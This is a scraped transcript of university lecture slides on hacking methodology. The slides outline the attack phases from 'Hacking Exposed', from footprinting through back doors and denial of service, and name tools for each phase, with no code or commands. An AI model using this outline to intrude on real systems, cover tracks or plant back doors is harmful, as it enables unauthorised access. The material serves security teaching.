Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 cs591 chow Hacking Methodology (Steps) An excellent description inside of the back cover page of “Hacking Exposed” text by McClure et al. Scanning Footprinting.

Published byDorothy Lang Modified over 8 years ago

Similar presentations

Presentation on theme: "1 cs591 chow Hacking Methodology (Steps) An excellent description inside of the back cover page of “Hacking Exposed” text by McClure et al. Scanning Footprinting."— Presentation transcript:

1 1 cs591 chow Hacking Methodology (Steps) An excellent description inside of the back cover page of “Hacking Exposed” text by McClure et al. Scanning Footprinting Enumeration Gaining Access Escalating Privilege Pilferting Covering Tracks Creating Back Doors Denial of Service whois, nslookup Nmap, fping dumpACL, showmount legion, rpcinfo Tcpdump, Lophtcrack NAT Johntheripper, getadmin Rhosts, userdata Config files, registry zap, rootkits Cron,at, startup folder netcat, keystroke logger remote desktop Synk4, ping of death tfn/stacheldraht

2 2 cs591 chow Footprinting Information gathering. Sam Spade is window-based network query tool. Find out target IP address/phone number range Why check phone numbers? Namespace acquisition. Network Topology (visualRoute). It is essential to a “surgical” attack. The key here is not to miss any details. Note that for penetration tester, this step is to avoiding testing others instead of your client and to include all systems to be tested (sometime the organization will not tell you what their systems consist of). Defense: deploy NIDS (snort), RotoRouter Technique s Open Source search Find domain name, admin, IP addresses name servers DNS zone transfer ToolsGoogleGoogle, search engine, EdgarEdgar Whois (Network solution; arin)‏Network solution arin Nslookup (ls – d) Nslookup (ls – d) dig Sam Spade Sam Spade

3 3 cs591 chow Scanning Bulk Target assessment Which machine is up and what ports (services) are open Focus on most promising avenues of entry. To avoid being detect, these tools can reduce frequency of packet sending and randomize the ports or IP addresses to be scanned in the sequence. Note that some machine does not respond to ping but responds to requests to ports that actually open. Ardor is an example. Technique s Ping sweepTCP/UDP port scan OS detection ToolsFpingFping, icmpenum WS_Ping ProPack nmap Nmap Nmap Superscan fscan Nmap Nmap queso siphon

4 4 cs591 chow Enumeration Identify valid user accounts or poorly protected resource shares. Most intrusive probing than scanning step. Techniqueslist user accounts list file sharesidentify applications ToolsNull sessions DumpACL Sid2usre onSiteAdmin Showmount NAT legion Banner grabing with telnet or netcat, rpcinfo netcat

5 5 cs591 chow Gaining Access Based on the information gathered so far, make an informed attempted to access the target. Techniq ues Password eavesdroppin g File share brute forcing Password File grab Buffer overflow ToolsTcpdump/ssld ump L0phtcrack readsmb NAT legion Tftp Pwddump2(NT )‏ Ttdb, bind IIS.HTR/ISM. DLL

6 6 cs591 chow Escalating Privilege If only user-level access was obtained in the last step, seek to gain complete control of the system. TechniquesPassword cracking Known Exploits ToolsJohn the ripper L0phtcrack Lc_messages, Getadmin, sechole

7 7 cs591 chow Pilfering Webster's Revised Unabridged Dictionary (1913) Pilfer \Pil"fer\, v. i. [imp. & p. p. Pilfered; p. pr. & vb. n. Pilfering.] [OF. pelfrer. See Pelf.] To steal in small quantities, or articles of small value; to practice petty theft.PilferedPelf Gather info on identify mechanisms to allow access of trusted systems. TechniquesEvaluate TrustsSearch for cleartext passwords Toolsrhosts LSA secrets User data, Configuration files Registry

8 8 cs591 chow Covering Tracks Once total ownership of the target is secured, hiding this fact from system administrators become paramount, less they quickly end the romp. TechniquesClear LogsHide tools ToolsZap, Event Log GUI Rootkits file streaming

9 9 cs591 chow Creating Back Doors Trap doors will be laid in various parts of the system to ensure that privilege access is easily regained whenever the intruder decides. Technique s Create rogue user accounts Schedule batch jobs Infect startup files ToolsMembers of wheel, admin Cron, ATrc, startup folder, registry keys Technique s Plant remote control services Install monitoring mechanisms Replace appls with Trojans ToolsNetcat, remote.exe VNC, B02K remote desktop Keystroke loggers, add acct. to secadmin mail aliases Login, fpnwcint.dll

10 10 cs591 chow Denial of Services If atacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort. Technique s Syn floodICMP techniquesIdentical src/dst SYN requests Toolssynk4Ping to death smurf Land Latierra Technique s Overlapping fragment/offse t bugs Out of bounds TCP options (OOB)‏ DDoS ToolsNetcat, remote.exe VNC, B02K remote desktop Keystroke loggers, add acct. to secadmin mail aliases Trinoo TFN stacheldraht

Download ppt "1 cs591 chow Hacking Methodology (Steps) An excellent description inside of the back cover page of “Hacking Exposed” text by McClure et al. Scanning Footprinting."

Similar presentations

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,

 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
Penetration Testing & Countermeasures Paul Fong & Cai Yu CS691 5 May 2003.

Penetration Testing & Countermeasures Paul Fong & Cai Yu CS691 5 May 2003.
1 Reading Log Files. 2 Segment Format

1 Reading Log Files. 2 Segment Format
Hackers, Crackers, and Network Intruders: Heroes, villains, or delinquents? Tim McLaren Thursday, September 28, 2000 McMaster University.

Hackers, Crackers, and Network Intruders: Heroes, villains, or delinquents? Tim McLaren Thursday, September 28, 2000 McMaster University.
Cryptography and Network Security Chapter 20 Intruders

Cryptography and Network Security Chapter 20 Intruders
Web Defacement Anh Nguyen May 6 th, 2010. Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.

Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Information Networking Security and Assurance Lab National Chung Cheng University Network Security (I) 授課老師 : 鄭伯炤 Office: Dept. of Communication Rm #112.

Information Networking Security and Assurance Lab National Chung Cheng University Network Security (I) 授課老師 : 鄭伯炤 Office: Dept. of Communication Rm #112.
Forces that Have Brought the world to it’s knees over the centuries.

Forces that Have Brought the world to it’s knees over the centuries.
Ethical Hacking Adapted from Zephyr Gauray’s slides found here: And from Achyut Paudel’s.

Ethical Hacking Adapted from Zephyr Gauray’s slides found here: And from Achyut Paudel’s.
Security (Continued) V.T. Raja, Ph.D., Oregon State University.

Security (Continued) V.T. Raja, Ph.D., Oregon State University.
A Discussion In Penetration Testing Marcial White.

A Discussion In Penetration Testing Marcial White.
INDEX  Ethical Hacking Terminology.  What is Ethical hacking?  Who are Ethical hacker?  How many types of hackers?  White Hats (Ethical hackers)

INDEX  Ethical Hacking Terminology.  What is Ethical hacking?  Who are Ethical hacker?  How many types of hackers?  White Hats (Ethical hackers)
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.

Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
1 cs691 chow C. Edward Chow Penetrate Testing. 2 cs691 chow Outline of The Talk Definition, Concepts on Penetration Testing/Hacking Anatomy of a Hack.

1 cs691 chow C. Edward Chow Penetrate Testing. 2 cs691 chow Outline of The Talk Definition, Concepts on Penetration Testing/Hacking Anatomy of a Hack.
Attack Profiles CS-480b Dick Steflik Attack Categories Denial-of-Service Exploitation Attacks Information Gathering Attacks Disinformation Attacks.

Attack Profiles CS-480b Dick Steflik Attack Categories Denial-of-Service Exploitation Attacks Information Gathering Attacks Disinformation Attacks.
Hacking Unix/Linux.

Hacking Unix/Linux.
Denial of Service Attacks: Methods, Tools, and Defenses Authors: Milutinovic, Veljko, Savic, Milan, Milic, Bratislav,

Denial of Service Attacks: Methods, Tools, and Defenses Authors: Milutinovic, Veljko, Savic, Milan, Milic, Bratislav,
Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.

Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.

Similar presentations

Ads by Google